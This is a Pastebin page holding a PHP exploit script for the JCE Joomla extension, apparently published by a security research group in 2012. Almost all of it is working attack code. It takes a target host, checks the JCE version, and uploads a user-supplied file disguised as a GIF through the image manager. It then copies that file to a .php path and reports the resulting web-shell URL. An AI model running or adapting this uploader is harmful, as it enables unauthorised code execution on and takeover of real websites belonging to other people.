Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

JCE exploit

By: a guest on Nov 16th, 2012  |  syntax: PHP  |  size: 10.19 KB  |  views: 7,507  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2. ######################################### www.bugreport.ir ########################################
  3. #
  4. #                     AmnPardaz Security Research & Penetration Testing Group
  5. #
  6. #
  7. # Title:                  Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
  8. # Vendor:                 http://www.joomlacontenteditor.net
  9. # Vulnerable Version:     JCE 2.0.10 (prior versions also may be affected)
  10. # Exploitation:           Remote with browser
  11. # Original Advisory:      http://www.bugreport.ir/index_78.htm
  12. # Vendor supplied patch:  http://www.joomlacontenteditor.net/news/item/jce-2011-released
  13. # CVSS2 Base Score:       (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5        
  14. # Coded By:               Mostafa Azizi
  15. ###################################################################################################
  16.  
  17. error_reporting(0);
  18. ini_set("max_execution_time",0);
  19. ini_set("default_socket_timeout", 2);
  20. ob_implicit_flush (1);
  21.  
  22. echo'<html>
  23. <head>
  24. <title>JCE Joomla Extension Remote File Upload</title>
  25. </head>
  26.  
  27. <body bgcolor="#00000">
  28.  
  29. <p align="center"><font size="4" color="#00ff00">JCE Joomla Extension Remote File Upload</font></p>
  30. </font>
  31. <table width="90%">
  32.  <tbody>
  33.    <tr>
  34.      <td width="43%" align="left">
  35.        <form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data"  method="post">
  36.          <p></font><font color="#00ff00" > hostname (ex:www.sitename.com):    </font><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
  37.          <p></font><font color="#00ff00" > path (ex: /joomla/ or just / ):            </font><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</span></p>
  38.          <p></font><font color="#00ff00" >Please specify a file to upload:           </font><input type="file" name="datafile" size="40"><font color="#FF0000"> * </font>
  39.          <p><font color="#00ff00" >  specify a port (default is 80):             </font><input name="port" size="20"><span class="Stile5"></span></p>
  40.          <p><font color="#00ff00" >  Proxy (ip:port):                                 </font><input name="proxy" size="20"><span class="Stile5"></span></p>
  41.          <p align="center"> <span class="Stile5"><font color="#FF0000">* </font><font color="white" >fields are required</font></font></span></p>
  42.          <p><input type="submit" value="Start" name="Submit"></p>
  43.        </form>
  44.      </td>
  45.    </tr>
  46.  </tbody>
  47. </table>
  48. </body></html>';
  49.  
  50. function sendpacket($packet,$response = 0,$output = 0,$s=0)
  51. {
  52.     $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
  53.     global $proxy, $host, $port, $html, $user, $pass;
  54.     if ($proxy == '')
  55.     {
  56.         $ock = fsockopen($host,$port);
  57.         stream_set_timeout($ock, 5);
  58.         if (!$ock)
  59.         {
  60.             echo '<font color=white> No response from '.htmlentities($host).' ...<br></font>';
  61.             die;
  62.         }
  63.     } else
  64.     {
  65.         $parts = explode(':',$proxy);
  66.         echo '<font color=white>Connecting to proxy: '.$parts[0].':'.$parts[1].' ...<br><br/></font>';
  67.         $ock   = fsockopen($parts[0],$parts[1]);
  68.         stream_set_timeout($ock, 5);
  69.         if (!$ock)
  70.         {
  71.             echo '<font color=white>No response from proxy...<br></font>';
  72.             die;
  73.         }
  74.     }
  75.  
  76.         fputs($ock,$packet);
  77.         if ($response == 1)
  78.         {
  79.             if ($proxy == '')
  80.             {
  81.                 $html = '';
  82.                 while (!feof($ock))
  83.                 {
  84.                     $html .= fgets($ock);
  85.                 }
  86.             } else
  87.             {
  88.                 $html = '';
  89.                 while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
  90.                 {
  91.                     $html .= fread($ock,1);
  92.                 }
  93.             }
  94.         } else $html = '';
  95.  
  96.         fclose($ock);
  97.         if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
  98.         if ($s==1){
  99.         $count=0;
  100.         $res=nl2br(htmlentities($html));
  101.         $str = array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
  102.         foreach ($str as $value){
  103.         $pos = strpos($res, $value);
  104.         if ($pos === false) {
  105.         $count=$count++;
  106.         } else {
  107.         echo "<font color=white>Target patched.<br/><br/></font>";
  108.         die();
  109.         }
  110.         }
  111.         if ($count=10) echo '<font color=white>Target is exploitable.<br/><br/></font>';
  112.         }
  113. }
  114.  
  115.   $host   = $_POST['host'];
  116.   $path   = $_POST['path'];
  117.   $port   = $_POST['port'];
  118.   $proxy   = $_POST['proxy'];
  119.  
  120. echo "0";
  121.    
  122. if (isset($_POST['Submit']) && $host != '' && $path != '')
  123. {
  124.  
  125.   $port=intval(trim($port));
  126.   if ($port=='') {$port=80;}
  127.   if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('<font color=white>Error... check the path!</font>');}
  128.   if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  129.   $host=str_replace("\r\n","",$host);
  130.   $path=str_replace("\r\n","",$path);
  131.  
  132.  
  133.                                                   /* Packet 1 --> Checking Exploitability */
  134.             $packet  = "GET ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
  135.             $packet .= "Host: ".$host."\r\n";
  136.             $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
  137.            
  138.             sendpacket($packet,1,0,1);
  139.  
  140.  
  141.                                         /* Packet 2 --> Uploading shell as a gif file */
  142.                                          
  143.             $content = "GIF89a1\n";
  144.             $content .= file_get_contents($_FILES['datafile']['tmp_name']);
  145.             $data    = "-----------------------------41184676334\r\n";
  146.             $data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
  147.             $data   .= "/\r\n";
  148.             $data   .= "-----------------------------41184676334\r\n";
  149.             $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
  150.             $data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
  151.             $data   .= "-----------------------------41184676334\r\n";
  152.             $data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
  153.             $data   .= "0\r\n";
  154.             $data   .= "-----------------------------41184676334\r\n";
  155.             $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n";
  156.             $data   .= "Content-Type: image/gif\r\n\r\n";
  157.             $data   .= "$content\r\n";
  158.             $data   .= "-----------------------------41184676334\r\n";
  159.             $data   .= "0day\r\n";
  160.             $data   .= "-----------------------------41184676334\r\n";
  161.             $data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
  162.             $data   .= "upload\r\n";
  163.             $data   .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
  164.             $packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
  165.             $packet .= "Host: ".$host."\r\n";
  166.             $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
  167.             $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
  168.             $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
  169.             $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  170.             $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
  171.             $packet .= "Connection: Close\r\n";
  172.             $packet .= "Proxy-Connection: close\r\n";
  173.             $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
  174.             $packet .= $data;
  175.            
  176.             sendpacket($packet,0,0,0);
  177.  
  178.                                           /* Packet 3 --> Change Extension from .gif to .php */
  179.                                        
  180.                                        
  181.             $packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
  182.             $packet .= "Host: ".$host."\r\n";
  183.             $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
  184.             $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
  185.             $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
  186.             $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
  187.             $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
  188.             $packet .= "Accept-Encoding: deflate\n";
  189.             $packet .= "X-Request: JSON\r\n";
  190.             $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
  191.             $ren ="json={"fn":"fileCopy","args":["/azizi.jpg","../../"]}";
  192.             $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
  193.             $packet .= $ren."\r\n\r\n";
  194.            
  195.             sendpacket($packet,1,0,0);
  196.                
  197.                                           /* Packet 4 --> Check for successfully uploaded */
  198.                                        
  199.                                        
  200.             $packet  = "Head ".$p."/images/stories/0day.php HTTP/1.1\r\n";
  201.             $packet .= "Host: ".$host."\r\n";
  202.             $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
  203.            
  204.             sendpacket($packet,1,0,0);
  205.                
  206.  
  207.   if(stristr($html , '200 OK') != true)
  208.   {echo "<font color=white>Exploit Faild...</font>";} else echo "<font color=white>Exploit Succeeded...<br>http://$host:$port$path"."/images/stories/0day.php</font>";
  209. }
  210. ?>